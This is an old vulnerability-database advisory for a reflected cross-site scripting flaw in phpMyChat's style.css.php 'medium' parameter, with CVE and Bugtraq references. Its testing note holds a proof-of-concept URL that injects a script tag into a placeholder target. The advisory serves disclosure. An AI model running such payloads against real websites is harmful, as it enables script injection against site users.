phpMyChat style.css.php medium Variable XSS

2005-12-01T16:51:01
ID OSVDB:21545
Type osvdb
Reporter OSVDB
Modified 2005-12-01T16:51:01

Description

Manual Testing Notes

http://[target]/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1

References:

Vendor URL: http://phpmychat.sourceforge.net/ Related OSVDB ID: 21546 Related OSVDB ID: 21544 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0017.html CVE-2005-3991 Bugtraq ID: 15679